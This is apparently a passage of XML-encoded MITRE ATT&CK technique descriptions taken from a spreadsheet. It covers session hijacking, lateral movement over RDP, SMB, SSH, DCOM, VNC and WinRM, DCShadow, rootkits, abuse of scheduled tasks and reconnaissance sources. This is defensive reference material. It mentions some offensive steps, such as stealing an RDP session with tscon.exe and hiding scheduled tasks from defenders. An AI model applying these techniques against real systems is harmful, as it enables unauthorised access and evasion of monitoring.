Adversaries may commandeer these sessions to carry out actions on remote systems. [Remote Service Session Hijacking](https://attack.mitre.org/techniques/T1563) differs from use of [Remote Services](https://attack.mitre.org/techniques/T1021) because it hijacks an existing session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: RDP Hijacking Medium)(Citation: Breach Post-mortem SSH Hijack)</t>
  </si>
  <si>
    <t>Adversaries may hijack a legitimate user’s remote desktop session to move laterally within an environment. Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services)
Adversaries may perform RDP session hijacking which involves stealing a legitimate user's remote session. Typically, a user is notified when someone else is trying to steal their session. With System permissions and using Terminal Services Console, `c:\windows\system32\tscon.exe [session number to be stolen]`, an adversary can hijack a session without the need for credentials or prompts to the user.(Citation: RDP Hijacking Korznikov) This can be done remotely or locally and with active or disconnected sessions.(Citation: RDP Hijacking Medium) It can also lead to [Remote System Discovery](https://attack.mitre.org/techniques/T1018) and Privilege Escalation by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in red teaming tools.(Citation: Kali Redsnarf)</t>
  </si>
  <si>
    <t>Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.
In order to move laterally from a compromised host, adversaries may take advantage of trust relationships established with other systems via public key authentication in active SSH sessions by hijacking an existing connection to another system. This may occur through compromising the SSH agent itself or by having access to the agent's socket. If an adversary is able to obtain root access, then hijacking SSH sessions is likely trivial.(Citation: Slideshare Abusing SSH)(Citation: SSHjack Blackhat)(Citation: Clockwork SSH Agent Hijacking)(Citation: Breach Post-mortem SSH Hijack)
[SSH Hijacking](https://attack.mitre.org/techniques/T1563/001) differs from use of [SSH](https://attack.mitre.org/techniques/T1021/004) because it hijacks an existing SSH session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078).</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.
In an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services)
Legitimate applications (such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) and other administrative programs) may utilize [Remote Services](https://attack.mitre.org/techniques/T1021) to access remote hosts. For example, Apple Remote Desktop (ARD) on macOS is native software used for remote management. ARD leverages a blend of protocols, including [VNC](https://attack.mitre.org/techniques/T1021/005) to send the screen and control buffers and [SSH](https://attack.mitre.org/techniques/T1021/004) for secure file transfer.(Citation: Remote Management MDM macOS)(Citation: Kickstart Apple Remote Desktop commands)(Citation: Apple Remote Desktop Admin Guide 3.3) Adversaries can abuse applications such as ARD to gain remote code execution and perform lateral movement. In versions of macOS prior to 10.14, an adversary can escalate an SSH session to an ARD session which enables an adversary to accept TCC (Transparency, Consent, and Control) prompts without user interaction and gain access to data.(Citation: FireEye 2019 Apple Remote Desktop)(Citation: Lockboxx ARD 2019)(Citation: Kickstart Apple Remote Desktop commands)</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.
The Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)(Citation: Microsoft COM)
Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.(Citation: Microsoft Process Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.(Citation: Microsoft COM ACL)
Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document. DCOM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). (Citation: MSDN WMI)</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services) 
Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1546/008) or [Terminal Services DLL](https://attack.mitre.org/techniques/T1505/005) for Persistence.(Citation: Alperovitch Malware)</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.
SMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba.
Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include `C$`, `ADMIN$`, and `IPC$`. Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over SMB,(Citation: Wikipedia Server Message Block) to interact with systems using remote procedure calls (RPCs),(Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) and certain configuration and patch levels.(Citation: Microsoft Admin Shares)</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.
SSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user’s public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user.</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC).  VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)
VNC differs from [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) as VNC is screen-sharing software rather than resource-sharing software. By default, VNC uses the system's authentication, but it can be configured to use credentials specific to VNC.(Citation: MacOS VNC software for Remote Desktop)(Citation: VNC Authentication)
Adversaries may abuse VNC to perform malicious actions as the logged-on user such as opening documents, downloading files, and running arbitrary commands. An adversary could use VNC to remotely control and monitor a system to collect data and information to pivot to other systems within the network. Specific VNC libraries/implementations have also been susceptible to brute force attacks and memory usage exploitation.(Citation: Hijacking VNC)(Citation: macOS root VNC login without authentication)(Citation: VNC Vulnerabilities)(Citation: Offensive Security VNC Authentication Check)(Citation: Attacking VNC Servers PentestLab)(Citation: Havana authentication bug)</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
WinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft WinRM) It may be called with the `winrm` command or by any number of programs such as PowerShell.(Citation: Jacobsen 2014) WinRM  can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).(Citation: MSDN WMI)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as  [Ping](https://attack.mitre.org/software/S0097) or &lt;code&gt;net view&lt;/code&gt; using [Net](https://attack.mitre.org/software/S0039).
Adversaries may also analyze data from local host files (ex: &lt;code&gt;C:\Windows\System32\Drivers\etc\hosts&lt;/code&gt; or &lt;code&gt;/etc/hosts&lt;/code&gt;) or other passive means (such as local [Arp](https://attack.mitre.org/software/S0099) cache entries) in order to discover the presence of remote systems in an environment.
Adversaries may also target discovery of network infrastructure as well as leverage [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands on network devices to gather detailed information about systems within a network (e.g. &lt;code&gt;show cdp neighbors&lt;/code&gt;, &lt;code&gt;show arp&lt;/code&gt;).(Citation: US-CERT-TA18-106A)(Citation: CISA AR21-126A FIVEHANDS May 2021)  
</t>
  </si>
  <si>
    <t>Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Mobile devices may also be used to infect PCs with malware if connected via USB.(Citation: Exploiting Smartphone USB ) This infection may be achieved using devices (Android, iOS, etc.) and, in some instances, USB charging cables.(Citation: Windows Malware Infecting Android)(Citation: iPhone Charging Cable Hack) For example, when a smartphone is connected to a system, it may appear to be mounted similar to a USB-connected disk drive. If malware that is compatible with the connected system is on the mobile device, the malware could infect the machine (especially if Autorun features are enabled).</t>
  </si>
  <si>
    <t>Adversaries may leverage the resources of co-opted systems in order to solve resource intensive problems, which may impact system and/or hosted service availability. 
One common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining.(Citation: CloudSploit - Unused AWS Regions) Containerized environments may also be targeted due to the ease of deployment via exposed APIs and the potential for scaling mining activities by deploying or compromising multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro Exposed Docker APIs)
Additionally, some cryptocurrency mining malware identify then kill off processes for competing malware to ensure it’s not competing for resources.(Citation: Trend Micro War of Crypto Miners)
Adversaries may also use malware that leverages a system's network bandwidth as part of a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or to seed malicious torrents.(Citation: GoBotKR)</t>
  </si>
  <si>
    <t>Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.
Registering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. (Citation: Adsecurity Mimikatz Guide)
This technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). (Citation: DCShadow Blog) The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform [SID-History Injection](https://attack.mitre.org/techniques/T1134/005) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. (Citation: DCShadow Blog)</t>
  </si>
  <si>
    <t>Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits) 
Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or [System Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)</t>
  </si>
  <si>
    <t>Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused task scheduling to potentially mask one-time execution under a trusted system process.(Citation: ProofPoint Serpent)</t>
  </si>
  <si>
    <t>Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the &lt;code&gt;at.allow&lt;/code&gt; file. If the &lt;code&gt;at.allow&lt;/code&gt; file does not exist, the &lt;code&gt;at.deny&lt;/code&gt; file is checked. Every username not listed in &lt;code&gt;at.deny&lt;/code&gt; is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the &lt;code&gt;at.deny&lt;/code&gt; exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
Adversaries may use [at](https://attack.mitre.org/software/S0110) to execute programs at system startup or on a scheduled basis for [Persistence](https://attack.mitre.org/tactics/TA0003). [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote [Execution](https://attack.mitre.org/tactics/TA0002) as part of [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and/or to run a process under the context of a specified account (such as SYSTEM).
In Linux environments, adversaries may also abuse [at](https://attack.mitre.org/software/S0110) to break out of restricted environments by using a task to spawn an interactive system shell or to run system commands. Similarly, [at](https://attack.mitre.org/software/S0110) may also be used for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) if the binary is allowed to run as superuser via &lt;code&gt;sudo&lt;/code&gt;.(Citation: GTFObins at)</t>
  </si>
  <si>
    <t>Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
In Kubernetes, a CronJob may be used to schedule a Job that runs one or more containers to perform specific tasks.(Citation: Kubernetes Jobs)(Citation: Kubernetes CronJob) An adversary therefore may utilize a CronJob to schedule deployment of a Job that executes malicious code in various nodes within a cluster.(Citation: Threat Matrix for Kubernetes)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse the &lt;code&gt;cron&lt;/code&gt; utility to perform task scheduling for initial or recurring execution of malicious code.(Citation: 20 macOS Common Tools and Techniques) The &lt;code&gt;cron&lt;/code&gt; utility is a time-based job scheduler for Unix-like operating systems.  The &lt;code&gt; crontab&lt;/code&gt; file contains the schedule of cron entries to be run and the specified times for execution. Any &lt;code&gt;crontab&lt;/code&gt; files are stored in operating system-specific file paths.
An adversary may use &lt;code&gt;cron&lt;/code&gt; in Linux or Unix environments to execute programs at system startup or on a scheduled basis for [Persistence](https://attack.mitre.org/tactics/TA0003). </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111) utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task.
The deprecated [at](https://attack.mitre.org/software/S0110) utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)), though &lt;code&gt;at.exe&lt;/code&gt; can not access tasks created with &lt;code&gt;schtasks&lt;/code&gt; or the Control Panel.
An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and/or to run a process under the context of a specified account (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused the Windows Task Scheduler to potentially mask one-time execution under signed/trusted system processes.(Citation: ProofPoint Serpent)
Adversaries may also create "hidden" scheduled tasks (i.e. [Hide Artifacts](https://attack.mitre.org/techniques/T1564)) that may not be visible to defender tools and manual queries used to enumerate tasks. Specifically, an adversary may hide a task from `schtasks /query` and the Task Scheduler by deleting the associated Security Descriptor (SD) registry value (where deletion of this value must be completed using SYSTEM permissions).(Citation: SigmaHQ)(Citation: Tarrask scheduled task) Adversaries may also employ alternate methods to hide tasks, such as altering the metadata (e.g., `Index` value) within associated registry keys.(Citation: Defending Against Scheduled Task Attacks in Windows Environments) </t>
  </si>
  <si>
    <t>Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension &lt;code&gt;.timer&lt;/code&gt; that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the &lt;code&gt;systemctl&lt;/code&gt; command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
Each &lt;code&gt;.timer&lt;/code&gt; file must have a corresponding &lt;code&gt;.service&lt;/code&gt; file with the same name, e.g., &lt;code&gt;example.timer&lt;/code&gt; and &lt;code&gt;example.service&lt;/code&gt;. &lt;code&gt;.service&lt;/code&gt; files are [Systemd Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by the systemd system and service manager.(Citation: Linux man-pages: systemd January 2014) Privileged timers are written to &lt;code&gt;/etc/systemd/system/&lt;/code&gt; and &lt;code&gt;/usr/lib/systemd/system&lt;/code&gt; while user level are written to &lt;code&gt;~/.config/systemd/user/&lt;/code&gt;.
An adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: gist Arch package compromise 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018) Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence.</t>
  </si>
  <si>
    <t>Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.
When scheduled exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) or [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as &lt;code&gt;CopyFromScreen&lt;/code&gt;, &lt;code&gt;xwd&lt;/code&gt;, or &lt;code&gt;screencapture&lt;/code&gt;.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware)
</t>
  </si>
  <si>
    <t>Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
Adversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).</t>
  </si>
  <si>
    <t>Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.
Adversaries may purchase information about their already identified targets, or use purchased data to discover opportunities for successful breaches. Threat actors may gather various technical details from purchased data, including but not limited to employee contact information, credentials, or specifics regarding a victim’s infrastructure.(Citation: ZDNET Selling Data) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).</t>
  </si>
  <si>
    <t>Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)
Adversaries may search in private threat intelligence vendor data to gather actionable information. Threat actors may seek information/indicators gathered about their own campaigns, as well as those conducted by other adversaries that may align with their target industries, capabilities/objectives, or other operational concerns. Information reported by vendors may also reveal opportunities other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).</t>
  </si>
  <si>
    <t>Adversaries may search freely available technical databases for information about victims that can be used during targeting. Information about victims may be available in online databases and repositories, such as registrations of domains/certificates as well as public collections of network data/artifacts gathered from traffic and/or scans.(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS)(Citation: Medium SSL Cert)(Citation: SSLShopper Lookup)(Citation: DigitalShadows CDN)(Citation: Shodan)
Adversaries may search in different open databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).</t>
  </si>
  <si>
    <t>Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.
Adversaries may search CDN data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about content servers within a CDN. Adversaries may also seek and target CDN misconfigurations that leak sensitive information not intended to be hosted and/or do not have the same protection mechanisms (ex: login portals) as the content hosted on the organization’s website.(Citation: DigitalShadows CDN) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)).</t>
  </si>
  <si>
    <t>Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.
Adversaries may search DNS data to gather actionable information. Threat actors can query nameservers for a target organization directly, or search through centralized repositories of logged DNS query responses (known as passive DNS).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Adversaries may also seek and target DNS misconfigurations/leaks that reveal information about internal networks. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).</t>
  </si>
  <si>
    <t>Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.
Adversaries may search digital certificate data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about certificates.(Citation: SSLShopper Lookup) Digital certificate data may also be available from artifacts signed by the organization (ex: certificates used from encrypted web traffic are served with content).(Citation: Medium SSL Cert) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).</t>
  </si>
  <si>
    <t>Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)
Adversaries may search scan databases to gather actionable information. Threat actors can use online resources and lookup tools to harvest information from these services. Adversaries may seek information about their already identified targets, or use these datasets to discover opportunities for successful breaches. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).</t>
  </si>
  <si>
    <t>Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)
Adversaries may search WHOIS data to gather actionable information. Threat actors can use online resources or command-line utilities to pillage through WHOIS data for information about potential victims. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).</t>
  </si>
  <si>
    <t>Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
